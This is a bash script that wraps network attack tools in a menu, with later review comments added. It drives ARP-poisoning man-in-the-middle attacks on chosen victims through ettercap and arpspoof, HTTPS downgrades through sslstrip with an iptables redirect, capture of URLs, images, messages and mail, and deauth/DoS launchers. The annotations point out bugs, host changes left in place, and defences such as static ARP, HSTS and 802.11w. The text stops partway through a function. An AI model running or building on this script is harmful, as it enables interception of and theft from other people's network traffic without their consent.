#!/bin/bash
#CAG-Script v0.4
#Script by CAG (aka BobaFett)
#May 2010 (updated June 2010)
#To run script, modify the "Customizable Variables" section to meet your needs, make it executable using chmod, or simply right click->properties->permissions->check "is executable", then change to the appropriate directory and type ./CAG-Script in terminal.
#I recommend you run this script on BT4. You will need to install some other programs (like airdrop-ng) if you wish to use them
#On a BT4 live cd I suggest you run my Airdrop-ng install script which will be posted on Pastebin shortly and then integrated into this script
#
# Reviewer overview
# -----------------
# Interactive, root-only menu wrapper around third-party tools (nmap, ettercap,
# arpspoof, urlsnarf, driftnet, msgsnarf, mailsnarf, sslstrip, airodump-ng /
# airdrop-ng, macchanger, wireshark, zenmap, etherape, ipscan, tuxcut).
# The script itself contains no attack logic; it only builds command lines.
#
# Host state this script changes (useful when triaging a machine it ran on):
#   * writes 1 to /proc/sys/net/ipv4/ip_forward (ipforwardstartfunc, sslstripfunc)
#   * appends a nat/PREROUTING REDIRECT rule for tcp/80 (sslstripfunc)
#   * deletes /root/*.csv (Airdropngfunc)
#   * creates a temp file via tempfile(1) that is never removed
# NOTE(review): exitfunc, sslstripexitfunc and ipforwardstopfunc are defined
# but no visible menu path calls them; every "Exit" option runs a bare `exit`.
# IP forwarding and the NAT rule therefore stay in place after the script ends.
#
# Defender view: the MITM options depend on ARP cache poisoning (mitigated by
# static ARP entries or switch-level dynamic ARP inspection), the sslstrip
# option depends on an HTTP downgrade (mitigated by HSTS, ideally preloaded),
# and the deauth option depends on unprotected 802.11 management frames
# (mitigated by 802.11w management frame protection).
#
# NOTE(review): nearly every expansion below is unquoted, and values typed at
# prompts are interpolated into `bash -c "..."` strings that run as root.

############### Customizable Variables ################
#You must change these to meet your system needs
export MACSPOOF="00:11:22:33:44:55" #Mac that macchanger defaults to. Can be any mac address
export WIFIMAN="wlan0" #your card interface (i.e. wlan0, eth0, etc)
export WIFIMON="mon0" #virtual "monitor mode" interface created using Airmon-ng (not referenced anywhere else in this file)
export TERMINAL="xterm" #Your terminal emulator of choice (i.e. xterm, terminator, etc)
export SSLSTRIPPORT="8080" #This can be any (small) number you choose
export SSLOPTIONS="-k -f -l $SSLSTRIPPORT" #Sslstrip options, run "python sslstrip.py -h" for help
export SSLSTRIPLOC=".../.sslstrip-0.7" #Location of sslstrip.py
export DRIFTNETOUT=".../Pics" #Where Driftnet stores captured images
export DRIFTNETOPTIONS="-a -d" #Driftnet options, run "driftnet -h" for help
export DROPRULES="/root/rules" #Airdrop-ng drop rules. You can edit this file "realtime" during the program
export TEXTEDITOR="kate" #Any gui text editor (i.e. kate, geany, etc)
export DEFAULTAIRODUMPOUT="/root/test" #Airodump output file location
export VICTIMIP="192.168.1.2" #default victim, you can change this temporarily during the script
############### Customizable Variables ################

################## Static Variables ###################
#Don't change any of these variables unless you know what you're doing
export ROOT_UID=0
export E_NOTROOT=87
export SSLSTRIPRUN=0
# ESSID is taken from the first double-quoted field of the iwconfig ESSID line.
export ESSIDVAR=$(iwconfig $WIFIMAN | grep ESSID | cut -d '"' -f 2)
# Third field of the "default" route line, i.e. the gateway address.
export GATEWAYIP=$(ip route show | grep default | awk '{ print $3}')
# NOTE(review): ip_addr_str is never assigned in this file, so SELFIP is empty
# unless the variable is inherited from the environment.
export SELFIP=$(echo $ip_addr_str|cut -d ' ' -f 9)
# NOTE(review): self_ip_dev is only assigned five lines further down, so it is
# empty here and ifconfig runs without an interface argument.
export SELFMAC=$(ifconfig ${self_ip_dev}|grep 'HWaddr'|cut -c 39-55)
# SELFIP, SELFMAC, fileout, fileout_path and ipblocks are not read anywhere
# else in this file.
export fileout=false
export fileout_path='./macs'
export ipblocks=51
# NOTE(review): tempfile(1) is a Debian-specific tool superseded by mktemp(1);
# the file is created at start-up and never deleted.
export tmpfile=$(tempfile)
export self_ip_dev=$(echo $ip_addr_str|cut -d ' ' -f 3)
################## Static Variables ###################

###################### Functions ######################

# Configmenufunc: settings menu. Reads a choice and overwrites one of the
# exported configuration variables for the current run, or opens the script
# itself in $TEXTEDITOR.
# NOTE(review): each arm re-invokes Configmenufunc instead of letting the
# enclosing `while` iterate, so the call stack grows with every choice. The
# other menu functions in this file follow the same pattern.
# NOTE(review): `export $VAR` expands the value, not the name. The variables
# are already exported at the top of the file, so the line adds nothing and
# errors on values that are not valid identifiers (paths, option strings).
Configmenufunc() {
  echo "1-6 are temporary. 7 is permanent."
  echo
  echo "1) Set Wireless/Wired interface (current: $WIFIMAN)"
  echo "2) Set gui text editor (current: $TEXTEDITOR)"
  echo "3) Set sslstrip options (current: $SSLOPTIONS)"
  echo "4) Set Driftnet output location (current: $DRIFTNETOUT"
  echo "5) Set Driftnet options (current: $DRIFTNETOPTIONS"
  echo "6) Set terminal emulator (current: $TERMINAL)"
  echo "7) Modify CAG-Script source"
  echo "8) Exit"
  echo "9) < Return to main menu"
  while [ 1 ]
  do
    read Configmenufunccase
    case "$Configmenufunccase" in
      "1")
        clear
        echo "Type Wireless/Wired interface (i.e Wlan0):"
        read WIFIMAN
        export $WIFIMAN
        Configmenufunc
        ;;
      "2")
        clear
        echo "Type gui text editor (i.e kate):"
        read TEXTEDITOR
        export $TEXTEDITOR
        Configmenufunc
        ;;
      "3")
        clear
        echo "Type sslstrip options (i.e. -k -f -l 8080):"
        read SSLOPTIONS
        export $SSLOPTIONS
        Configmenufunc
        ;;
      "4")
        clear
        echo "Type Driftnet output location (i.e. /root/Pics):"
        read DRIFTNETOUT
        export $DRIFTNETOUT
        Configmenufunc
        ;;
      "5")
        # NOTE(review): the menu labels this "Set Driftnet options", but the
        # arm is a copy of option 6 and changes TERMINAL instead.
        clear
        echo "Type terminal emulator (i.e. xterm):"
        read TERMINAL
        export $TERMINAL
        Configmenufunc
        ;;
      "6")
        clear
        echo "Type terminal emulator (i.e. xterm):"
        read TERMINAL
        export $TERMINAL
        Configmenufunc
        ;;
      "7")
        clear
        echo "*WARNING* Do not modify any section of this file other than 'Customizable Variables' section unless you know what you're doing. All changes are permanent."
        # Opens a file named CAG-Script relative to the current directory.
        $TEXTEDITOR CAG-Script
        clear
        Configmenufunc
        ;;
      "8")
        #exitfunc this needs to be written
        exit
        ;;
      "9")
        clear
        Mainmenufunc
        ;;
    esac
  done
}
export -f Configmenufunc

# scriptstartfunc: cosmetic start-up banner (three redraws with short sleeps).
scriptstartfunc() {
  echo "Initializing CAG-Script."
  sleep .3
  clear
  echo "Initializing CAG-Script.."
  sleep .3
  clear
  echo "Initializing CAG-Script..."
  sleep .5
  clear
}

# nmapscanfunc: runs an nmap ping sweep and stores up to nine responding
# addresses in victim1..victim9.
# The scan range is derived from the gateway only when the gateway string is
# exactly 11 characters long (its first 10 characters plus "*"); otherwise the
# range is read from the prompt.
# Grepable output goes to ${tmpfile}; hosts marked "Status: Up" are extracted.
# NOTE(review): `set $ip_list` replaces the positional parameters of this
# function and word-splits the list; hosts beyond the ninth are ignored.
nmapscanfunc() {
  export GATEWAYLENGTH=$(expr length "$GATEWAYIP")
  if [ $GATEWAYLENGTH -eq "11" ]
  then
    export NMAPVICTIMFRONT=$(ip route show | grep default | awk '{ print $3}' | cut -c 1-10)
    export NMAPVICTIMEND="*"
    NMAPVICTIMS="${NMAPVICTIMFRONT}${NMAPVICTIMEND}"
  else
    # NOTE(review): the message below contains an invisible Unicode
    # formatting character after "non-standard ".
    echo "non-standard ‬ip length, type nmap victims manually, replacing last digit(s) with '*' (i.e. 192.168.1.*)"
    read NMAPVICTIMS
  fi
  clear
  nmap -n -sP -oG ${tmpfile} $NMAPVICTIMS #>/dev/null
  ip_list=$(grep 'Status: Up' ${tmpfile}|cut -d ' ' -f 2 )
  set $ip_list
  victim1=$1
  victim2=$2
  victim3=$3
  victim4=$4
  victim5=$5
  victim6=$6
  victim7=$7
  victim8=$8
  victim9=$9
}
export -f nmapscanfunc

# choosevictimafternmapfunc: lists the non-empty victimN values and exports the
# selected one as VICTIMIP.
# NOTE(review): `[ $victimN -ne ]` is not a valid comparison. With an empty
# variable it collapses to `[ -ne ]` (true, so nothing is printed); with a
# value, `[` fails, the error is hidden by 2>/dev/null and the else branch
# prints the entry. `[ -n "$victimN" ]` states the intent directly.
# The selection loop accepts 1-9 even for entries that were not listed, in
# which case VICTIMIP becomes empty.
choosevictimafternmapfunc() {
  if [ $victim1 -ne ] 2>/dev/null
  then
    echo -n
  else
    echo "1) $victim1"
  fi
  if [ $victim2 -ne ] 2>/dev/null
  then
    echo -n
  else
    echo "2) $victim2"
  fi
  if [ $victim3 -ne ] 2>/dev/null
  then
    echo -n
  else
    echo "3) $victim3"
  fi
  if [ $victim4 -ne ] 2>/dev/null
  then
    echo -n
  else
    echo "4) $victim4"
  fi
  if [ $victim5 -ne ] 2>/dev/null
  then
    echo -n
  else
    echo "5) $victim5"
  fi
  if [ $victim6 -ne ] 2>/dev/null
  then
    echo -n
  else
    echo "6) $victim6"
  fi
  if [ $victim7 -ne ] 2>/dev/null
  then
    echo -n
  else
    echo "7) $victim7"
  fi
  if [ $victim8 -ne ] 2>/dev/null
  then
    echo -n
  else
    echo "8) $victim8"
  fi
  if [ $victim9 -ne ] 2>/dev/null
  then
    echo -n
  else
    echo "9) $victim9"
  fi
  echo "choose victim IP:"
  while [ 1 ]
  do
    read Nmapscancase
    case "$Nmapscancase" in
      "1")
        export VICTIMIP=$victim1
        break
        ;;
      "2")
        export VICTIMIP=$victim2
        break
        ;;
      "3")
        export VICTIMIP=$victim3
        break
        ;;
      "4")
        export VICTIMIP=$victim4
        break
        ;;
      "5")
        export VICTIMIP=$victim5
        break
        ;;
      "6")
        export VICTIMIP=$victim6
        break
        ;;
      "7")
        export VICTIMIP=$victim7
        break
        ;;
      "8")
        export VICTIMIP=$victim8
        break
        ;;
      "9")
        export VICTIMIP=$victim9
        break
        ;;
    esac
  done
}
export -f choosevictimafternmapfunc

# arghelp: intended usage text.
# NOTE(review): the first line lacks `echo`, so the shell tries to execute a
# command named "Usage:"; the `echo"..."` lines lack the space after echo and
# are likewise parsed as (non-existent) command names.
arghelp() {
  Usage: $0 ./CAG-Script [args]
  echo" -h, --help - Print this help and exit"
  echo" -i. --iface - Interface to use"
  echo" -v, --victim - IP address of desired host"
  echo" -g, --gateway - IP address of network gateway"
}
export -f arghelp

# argfunc: command-line option parser operating on its own arguments.
# NOTE(review): the main program calls `argfunc` without "$@", so $# is 0 and
# the loop body never runs as the script is written.
# NOTE(review): `help` is the bash builtin, not arghelp; `die` is not defined
# in this file; the help text advertises --gateway while the pattern is --gw;
# `iface` is set but not read elsewhere in this file.
argfunc() {
  export -f arghelp
  while [ $# -gt 0 ]
  do
    case "$1" in
      "-h"|"--help")
        help
        exit
        ;;
      "-v"|"--victim")
        export VICTIMIP="$2"
        ;;
      "-g"|"--gw")
        export GATEWAYIP="$2"
        ;;
      "-i"|"--iface")
        if [ $(ifconfig "$2" &> /dev/null; echo $?) == 1 ] ;then
          die "Error: interface "$2" does not exist!"
        else
          iface="-i $2"
        fi
        ;;
    esac
    shift
  done
}
export -f argfunc

# rootcheck: exits with status $E_NOTROOT (87) unless $UID equals $ROOT_UID (0).
rootcheck() {
  if [ "$UID" -ne "$ROOT_UID" ]
  then
    echo "Must be root to run this script."
    exit $E_NOTROOT
  fi
}
export -f rootcheck

# ipforwardstartfunc: turns on kernel IPv4 forwarding for the whole host.
# The previous value is not saved, so it cannot be restored afterwards.
ipforwardstartfunc() {
  echo 1 > /proc/sys/net/ipv4/ip_forward
}
export -f ipforwardstartfunc

# ipforwardstopfunc: writes 0 to ip_forward until the file no longer reads 1.
# Not called from anywhere in this file.
ipforwardstopfunc() {
  while [ $(cat /proc/sys/net/ipv4/ip_forward) == 1 ]
  do
    echo 0 > /proc/sys/net/ipv4/ip_forward
  done
}
export -f ipforwardstopfunc

# checkconnectionfunc: treats an empty default-gateway lookup as "no internet"
# and records the result in connectionvar.
# Not called from anywhere in this file and not exported.
# NOTE(review): `[ $GATEWAYIP -ne ]` is the same malformed test used in
# choosevictimafternmapfunc, here without stderr suppression. The success
# branch overwrites VICTIMIP from IP1/IP2 and then calls `exit`, which would
# end the whole script.
checkconnectionfunc() {
  export GATEWAYIP="$(ip route show | grep default | awk '{ print $3}')"
  if [ $GATEWAYIP -ne ]
  then
    echo "No internet available :("
    export connectionvar=0
  else
    export GATEWAYIP="$(ip route show | grep default | awk '{ print $3}')"
    export VICTIMIP="/${IP1}${IP2}/"
    echo "We've got internet"
    export connectionvar=1
    exit
  fi
}

# essidfunc: refreshes ESSIDVAR from iwconfig and prints it.
# Not called from anywhere in this file and not exported.
essidfunc() {
  export ESSIDVAR=$(iwconfig $WIFIMAN | grep ESSID | cut -d '"' -f 2)
  echo "connected to $ESSIDVAR"
}

# exitfunc: intended clean-up: disable forwarding, stop sslstrip, reset
# iptables. Only referenced in comments ("this needs to be written"); never
# called.
# NOTE(review): the four iptables commands flush and delete every rule and
# user chain in the filter and nat tables, not just the REDIRECT rule added by
# sslstripfunc. On a host with its own firewall rules this removes them.
# Deleting only the rule that was added (`iptables -t nat -D PREROUTING ...`
# with the same match as the -A) would leave the host policy intact.
# NOTE(review): sslstrip is started as `python sslstrip.py`; killall/pkill
# matching on the name "sslstrip" presumably will not find it (confirm).
exitfunc() {
  echo 0 > /proc/sys/net/ipv4/ip_forward
  killall sslstrip 2>/dev/null
  pkill sslstrip 2>/dev/null
  iptables --flush
  iptables --table nat --flush
  iptables --delete-chain
  iptables --table nat --delete-chain
}
export -f exitfunc

# sslstripexitfunc: same full iptables reset as exitfunc, without touching
# ip_forward or processes. Never called in this file. The caveat about
# flushing unrelated firewall rules applies here as well.
sslstripexitfunc() {
  iptables --flush
  iptables --table nat --flush
  iptables --delete-chain
  iptables --table nat --delete-chain
}
export -f sslstripexitfunc

# chooseettercapvictim: prompts for the last two octets after a fixed
# "192.168." prefix and exports VICTIMIP/GATEWAYIP in ettercap's /addr/ form.
# Empty input selects "//" for both.
# NOTE(review): `[ $IP2 -eq ]` is true only when IP2 is empty; with a value the
# test errors (message printed to stderr) and the else branch runs. The
# "192.168." prefix is hard-coded, independent of the actual network.
chooseettercapvictim() {
  echo "Complete victim IP:"
  echo "leave blank and press enter to spoof entire network"
  echo -n "192.168." && read IP2
  IP1=192.168.
  if [ $IP2 -eq ]
  then
    export VICTIMIP="//"
    export GATEWAYIP="//"
    echo "spoofing entire network..."
    echo "press q to re-arp victims"
  else
    export GATEWAYIP=$(ip route show | grep default | awk '{ print $3}')
    export VICTIMIP="/${IP1}${IP2}/"
  fi
}
export -f chooseettercapvictim

# choosearpspoofvictim: arpspoof counterpart of chooseettercapvictim. Sets
# VICTIMIP and TARGETOPTION ("-t", or a single space when input is empty).
# Uses the same malformed `[ $IP2 -eq ]` emptiness test and the same
# hard-coded "192.168." prefix.
choosearpspoofvictim() {
  echo "Complete victim IP:"
  echo "leave blank and press enter to spoof entire network"
  echo -n "192.168." && read IP2
  IP1=192.168.
  if [ $IP2 -eq ]
  then
    export VICTIMIP=" "
    export TARGETOPTION=" "
    echo "spoofing entire network..."
  else
    export VICTIMIP=${IP1}${IP2}
    export TARGETOPTION="-t"
    echo $VICTIMIP
  fi
}
export -f choosearpspoofvictim

# ettercapfunc: sub-menu that runs ettercap in text mode with ARP MITM between
# the gateway and the selected host(s). Launched in a separate terminal by
# MITMattackmenufunc via `bash -c`, which is why it and its helpers are
# exported with `export -f`.
# After each run GATEWAYIP is re-read from the routing table because
# chooseettercapvictim may have overwritten it with "//".
# NOTE(review): unlike the arpspoof paths, no arm here calls
# ipforwardstartfunc.
# Defender view: ARP MITM is visible as the gateway IP suddenly mapping to a
# different MAC in peers' ARP caches.
ettercapfunc() {
  echo "1) Run Arp-Poisoning attack against $VICTIMIP"
  echo "2) Spoof entire network (this will drastically slow down large networks)"
  echo "3) Manually type victim IP"
  echo "4) Scan for victims using Nmap"
  echo "5) < Return to MITM menu"
  echo "6) exit"
  while [ 1 ]
  do
    read restartettercapmenu
    case "$restartettercapmenu" in
      "1")
        echo " "
        echo "...starting Ettercap-Ng, press q to stop attack..."
        echo " "
        ettercap -T -i $WIFIMAN -Tq -M ARP /$GATEWAYIP/ /$VICTIMIP/
        export GATEWAYIP=$(ip route show | grep default | awk '{ print $3}')
        ettercapfunc
        ;;
      "2")
        echo " "
        echo "...starting Ettercap-Ng, press q to stop attack..."
        echo " "
        ettercap -T -i $WIFIMAN -Tq -M ARP // //
        export GATEWAYIP=$(ip route show | grep default | awk '{ print $3}')
        ettercapfunc
        ;;
      "3")
        echo " "
        echo "...starting Ettercap-Ng, press q to stop attack..."
        echo " "
        chooseettercapvictim
        ettercap -T -i $WIFIMAN -Tq -M ARP /$GATEWAYIP/ $VICTIMIP
        export GATEWAYIP=$(ip route show | grep default | awk '{ print $3}')
        ettercapfunc
        ;;
      "4")
        nmapscanfunc
        choosevictimafternmapfunc
        echo " "
        echo "...starting Ettercap-Ng, press q to stop attack..."
        echo " "
        export GATEWAYIP=$(ip route show | grep default | awk '{ print $3}')
        ettercap -T -i $WIFIMAN -Tq -M ARP /$GATEWAYIP/ /$VICTIMIP/
        ettercapfunc
        ;;
      "5")
        clear
        MITMattackmenufunc
        ;;
      "6")
        exit
        ;;
    esac
  done
}
export -f ettercapfunc

# arpspooffunc: sub-menu that enables IP forwarding and runs arpspoof against
# the gateway, optionally limited to one host with -t.
# NOTE(review): forwarding is switched on before every run and never switched
# off again (see ipforwardstartfunc / exitfunc).
arpspooffunc() {
  echo "1) Run Arp-Poisoning attack against $VICTIMIP"
  echo "2) Spoof entire network (this will drastically slow down large networks)"
  echo "3) Manually type victim IP"
  echo "4) Scan for victims using Nmap"
  echo "5) < Return to MITM menu"
  echo "6) exit"
  while [ 1 ]
  do
    read restartarpspoofmenu
    case "$restartarpspoofmenu" in
      "1")
        echo " "
        echo "...starting Arpspoof, press ctrl-c to stop attack..."
        echo " "
        ipforwardstartfunc
        arpspoof -i $WIFIMAN -t $VICTIMIP $GATEWAYIP
        arpspooffunc
        ;;
      "2")
        echo " "
        echo "...starting Arpspoof, press ctrl-c to stop attack..."
        echo " "
        ipforwardstartfunc
        arpspoof -i $WIFIMAN $GATEWAYIP
        arpspooffunc
        ;;
      "3")
        choosearpspoofvictim
        echo
        echo "...starting Arpspoof attack, press ctrl-c to stop attack..."
        echo
        ipforwardstartfunc
        arpspoof -i $WIFIMAN $TARGETOPTION $VICTIMIP $GATEWAYIP
        arpspooffunc
        ;;
      "4")
        nmapscanfunc
        choosevictimafternmapfunc
        echo
        echo "...starting Arpspoof attack, press ctrl-c to stop attack..."
        echo
        ipforwardstartfunc
        arpspoof -i $WIFIMAN -t $VICTIMIP $GATEWAYIP
        arpspooffunc
        MITMattackmenufunc
        ;;
      "5")
        MITMattackmenufunc
        ;;
      "6")
        exit
        ;;
    esac
  done
}
export -f arpspooffunc

# urlsnarffunc: enables IP forwarding, then runs urlsnarf on $WIFIMAN.
urlsnarffunc() {
  ipforwardstartfunc
  urlsnarf -i $WIFIMAN
}
export -f urlsnarffunc

# driftnetfunc: enables IP forwarding, runs driftnet with the configured
# options and output directory, then offers to delete the captured images.
# NOTE(review): `-eq` is an integer comparison, so `[ ... -eq yes ]` always
# errors and the else branch (`exit`) runs whatever is typed; a string test
# would be `[ "$driftnetdeleteopt" = yes ]`.
# NOTE(review): `rm -r $DRIFTNETOUT` runs as root on an unquoted,
# operator-supplied path. Quoting it and guarding against an empty value
# (`rm -r -- "${DRIFTNETOUT:?}"`) avoids deleting the wrong tree.
driftnetfunc() {
  ipforwardstartfunc
  driftnet -i $WIFIMAN $DRIFTNETOPTIONS $DRIFTNETOUT
  echo "Driftnet killed, delete captured images? (yes,no)"
  read driftnetdeleteopt
  if [ $driftnetdeleteopt -eq yes ]
  then
    rm -r $DRIFTNETOUT
    mkdir $DRIFTNETOUT
  else
    exit
  fi
}
export -f driftnetfunc

# webspyfunc: placeholder, prints "not complete".
webspyfunc() {
  echo "not complete"
}
export -f webspyfunc

# msgsnarffunc: enables IP forwarding, then runs msgsnarf.
# NOTE(review): the interface is hard-coded to wlan0 instead of $WIFIMAN.
msgsnarffunc() {
  ipforwardstartfunc
  msgsnarf -i wlan0
}
export -f msgsnarffunc

# mailsnarffunc: enables IP forwarding, then runs mailsnarf.
# NOTE(review): the interface is hard-coded to wlan0 instead of $WIFIMAN.
mailsnarffunc() {
  ipforwardstartfunc
  mailsnarf -i wlan0
}
export -f mailsnarffunc

# sslstripfunc: appends a nat/PREROUTING rule redirecting tcp/80 to
# $SSLSTRIPPORT, enables IP forwarding, changes into $SSLSTRIPLOC and runs
# sslstrip.py with $SSLOPTIONS (stderr discarded).
# NOTE(review): the run-once guard around the iptables line is commented out,
# so each invocation appends another copy of the rule; nothing removes it.
# NOTE(review): `cd $SSLSTRIPLOC` is unchecked; if it fails, python is started
# from the current directory.
# Defender view: the downgrade this relies on does not work against sites the
# browser already knows to be HSTS-only.
sslstripfunc() {
  #if [ "$SSLSTRIPRUN" -eq "0" ]
  #then
  iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port $SSLSTRIPPORT
  # SSLSTRIPRUN=1
  #fi
  #ipforwardstartfunc
  echo 1 > /proc/sys/net/ipv4/ip_forward
  cd $SSLSTRIPLOC
  #$TERMINAL --execute bash -c "cd $SSLSTRIPLOC && cat sslstrip.log ; bash" &
  python sslstrip.py $SSLOPTIONS 2> /dev/null
}
export -f sslstripfunc

# tcpkillfunc: placeholder, prints "not complete".
tcpkillfunc() {
  echo "not complete"
}
export -f tcpkillfunc

# MITMhelpfunc: prints the -h output of the selected tool, waits for Enter and
# returns to the MITM menu.
# NOTE(review): the prompt says "return to help menu", but every arm calls
# MITMattackmenufunc.
MITMhelpfunc() {
  clear
  echo "CHoose program manual to read:"
  echo "1) Ettercap-ng"
  echo "2) Arpspoof"
  echo "3) Urlsnarf"
  echo "4) Driftnet"
  echo "5) Webspy"
  echo "6) Msgsnarf"
  echo "7) Mailsnarf"
  echo "8) Sslstrip"
  echo "9) Tcpkill"
  echo "10) < Return to MITM menu"
  while [ 1 ]
  do
    read MITMhelpcase
    case "$MITMhelpcase" in
      "1")
        ettercap -h
        echo "Press enter to return to help menu:"
        read MITMHELPVAR
        clear
        MITMattackmenufunc
        ;;
      "2")
        arpspoof -h
        echo "Press enter to return to help menu:"
        read MITMHELPVAR
        clear
        MITMattackmenufunc
        ;;
      "3")
        urlsnarf -h
        echo "Press enter to return to help menu:"
        read MITMHELPVAR
        clear
        MITMattackmenufunc
        ;;
      "4")
        driftnet -h
        echo "Press enter to return to help menu:"
        read MITMHELPVAR
        clear
        MITMattackmenufunc
        ;;
      "5")
        webspy -h
        echo "Press enter to return to help menu:"
        read MITMHELPVAR
        clear
        MITMattackmenufunc
        ;;
      "6")
        msgsnarf -h
        echo "Press enter to return to help menu:"
        read MITMHELPVAR
        clear
        MITMattackmenufunc
        ;;
      "7")
        mailsnarf -h
        echo "Press enter to return to help menu:"
        read MITMHELPVAR
        clear
        MITMattackmenufunc
        ;;
      "8")
        cd $SSLSTRIPLOC
        python sslstrip.py -h
        echo "Press enter to return to help menu:"
        read MITMHELPVAR
        clear
        MITMattackmenufunc
        ;;
      "9")
        tcpkill -h
        echo "Press enter to return to help menu:"
        read MITMHELPVAR
        clear
        MITMattackmenufunc
        ;;
      "10")
        clear
        MITMattackmenufunc
        ;;
    esac
  done
}
export -f MITMhelpfunc

# MITMattackmenufunc: MITM tool menu. Each tool is started in a new $TERMINAL
# window through `bash -c "<function> ; bash"`, which depends on the functions
# having been exported with `export -f`; the trailing `bash` keeps the window
# open afterwards.
# NOTE(review): arms 9 and 10 do not match the printed labels: "9) Tcpkill"
# only redraws the menu, while "10) Help" starts tcpkillfunc and then opens
# the help menu.
MITMattackmenufunc() {
  clear
  echo "Choose program:"
  echo "1) Ettercap"
  echo "2) Arpspoof"
  echo "3) Urlsnarf"
  echo "4) Driftnet"
  echo "5) Webspy (not working yet...)"
  echo "6) Msgsnarf"
  echo "7) Mailsnarf"
  echo "8) Sslstrip"
  echo "9) Tcpkill"
  echo "10) Help"
  echo "11) < Return to main menu"
  while [ 1 ]
  do
    read MITMattackmenucase
    case "$MITMattackmenucase" in
      "1")
        $TERMINAL --execute bash -c "ettercapfunc ; bash" &
        clear
        MITMattackmenufunc
        ;;
      "2")
        $TERMINAL --execute bash -c "arpspooffunc ; bash" &
        clear
        MITMattackmenufunc
        ;;
      "3")
        $TERMINAL --execute bash -c "urlsnarffunc ; bash" &
        clear
        MITMattackmenufunc
        ;;
      "4")
        $TERMINAL --execute bash -c "driftnetfunc ; bash" &
        clear
        MITMattackmenufunc
        ;;
      "5")
        $TERMINAL --execute bash -c "webspyfunc ; bash" &
        clear
        MITMattackmenufunc
        ;;
      "6")
        $TERMINAL --execute bash -c "msgsnarffunc ; bash" &
        clear
        MITMattackmenufunc
        ;;
      "7")
        $TERMINAL --execute bash -c "mailsnarffunc ; bash" &
        clear
        MITMattackmenufunc
        ;;
      "8")
        $TERMINAL --execute bash -c "sslstripfunc ; bash" &
        MITMattackmenufunc
        ;;
      "9")
        clear
        MITMattackmenufunc
        ;;
      "10")
        $TERMINAL --execute bash -c "tcpkillfunc ; bash" &
        clear
        MITMhelpfunc
        ;;
      "11")
        clear
        Mainmenufunc
        ;;
    esac
  done
}
export -f MITMattackmenufunc

# Mainmenufunc: top-level menu dispatching to the MITM, passive, deauth and
# config sub-menus.
# NOTE(review): this function is not exported, so it is unavailable inside the
# `bash -c` child shells started by the other menus.
Mainmenufunc() {
  echo "Choose type of attack:"
  echo "1) MITM attack"
  echo "2) Passive sniffing and probing"
  echo "3) Deauth/Dos attack"
  echo "4) Config"
  echo "5) Help"
  echo "6) Exit"
  while [ 1 ]
  do
    read Mainmenucase
    case "$Mainmenucase" in
      "1")
        clear
        MITMattackmenufunc
        Mainmenufunc
        ;;
      "2")
        clear
        Passivesniffingmenufunc
        Mainmenufunc
        ;;
      "3")
        clear
        Deauthmenu
        Mainmenufunc
        ;;
      "4")
        clear
        Configmenufunc
        ;;
      "5")
        clear
        echo "No help yet, sorry..."
        Mainmenufunc
        ;;
      "6")
        # Bare exit: forwarding and iptables state are left as they are.
        exit
        ;;
    esac
  done
}

# Passivesniffingmenufunc: launcher for GUI/CLI inspection tools; GUI tools are
# started in the background with stderr discarded.
Passivesniffingmenufunc() {
  echo "Choose program to run:"
  echo "1) Wireshark"
  echo "2) Zenmap"
  echo "3) EtherApe"
  echo "4) Angry IP Scanner"
  echo "5) ifconfig"
  echo "6) iwconfig"
  echo "7) Help"
  echo "8) Exit"
  echo "9) < Return to main menu"
  while [ 1 ]
  do
    read Passivesniffingmenucase
    case "$Passivesniffingmenucase" in
      "1")
        wireshark 2> /dev/null &
        clear
        Passivesniffingmenufunc
        ;;
      "2")
        zenmap 2> /dev/null &
        clear
        Passivesniffingmenufunc
        ;;
      "3")
        etherape -i $WIFIMAN 2> /dev/null &
        clear
        Passivesniffingmenufunc
        ;;
      "4")
        /usr/bin/ipscan 2> /dev/null &
        clear
        Passivesniffingmenufunc
        ;;
      "5")
        ifconfig
        Passivesniffingmenufunc
        ;;
      "6")
        iwconfig
        Passivesniffingmenufunc
        ;;
      "7")
        clear
        echo "No help, sorry..."
        Passivesniffingmenufunc
        ;;
      "8")
        #exitfunc this needs to be written
        exit
        ;;
      "9")
        Mainmenufunc
        ;;
    esac
  done
}
# NOTE(review): without -f this exports a (non-existent) variable of that name,
# not the function.
export Passivesniffingmenufunc

# Macchangerfunc: MAC address menu built on macchanger. No menu in this file
# calls it.
# NOTE(review): option 3 does not bring the interface down/up around the
# change, unlike options 1, 2 and 4.
# NOTE(review): in option 4, `read $CUSTOMMACCHANGEROPTONS` expands an unset
# variable, so the input is stored in REPLY and the macchanger call receives
# no extra options.
# NOTE(review): "5) Help" only returns to the main menu.
Macchangerfunc() {
  echo "1) Spoof Mac address to $MACSPOOF"
  echo "2) Manually type Mac address"
  echo "3) Random Mac address"
  echo "4) Run custom command"
  echo "5) Help"
  echo "6) < Return to main menu"
  while [ 1 ]
  do
    read CHOICE1
    case "$CHOICE1" in
      "1")
        ifconfig $WIFIMAN down
        macchanger $WIFIMAN -m $MACSPOOF
        ifconfig $WIFIMAN up
        echo
        Mainmenufunc
        ;;
      "2")
        echo "Type new fake mac address: (i.e. 00:11:22:33:44:55)"
        read MACINTCUSTOM
        ifconfig $WIFIMAN down
        macchanger $WIFIMAN -m $MACINTCUSTOM
        ifconfig $WIFIMAN up
        echo
        Mainmenufunc
        ;;
      "3")
        macchanger $WIFIMAN -r
        echo
        Mainmenufunc
        ;;
      "4")
        echo "Type custom macchanger command:"
        ifconfig $WIFIMAN down
        echo -n "macchanger $WIFIMAN" && read $CUSTOMMACCHANGEROPTONS
        macchanger $WIFIMAN $CUSTOMMACCHANGEROPTONS
        ifconfig $WIFIMAN up
        clear
        Mainmenufunc
        ;;
      "5")
        clear
        Mainmenufunc
        ;;
      "6")
        clear
        Mainmenufunc
        ;;
    esac
  done
}
export -f Macchangerfunc

# Deauthmenu: launcher for airdrop-ng (in a new terminal) and tuxcut.
# NOTE(review): arms 1-3 return to Passivesniffingmenufunc rather than
# redrawing this menu.
# Defender view: 802.11w management frame protection is the standard
# mitigation for deauthentication floods.
Deauthmenu() {
  echo "Choose program to run:"
  echo "1) Airdrop-ng"
  echo "2) Tuxcut"
  #echo "3) "
  #echo "4) "
  #echo "5) "
  #echo "6) "
  #echo "7) "
  echo "3) Help"
  echo "4) Exit"
  echo "5) < Return to main menu"
  while [ 1 ]
  do
    read Deauthmenucase
    case "$Deauthmenucase" in
      "1")
        $TERMINAL --execute bash -c "Airdropngfunc ; bash" &
        clear
        Passivesniffingmenufunc
        ;;
      "2")
        tuxcut &
        clear
        Passivesniffingmenufunc
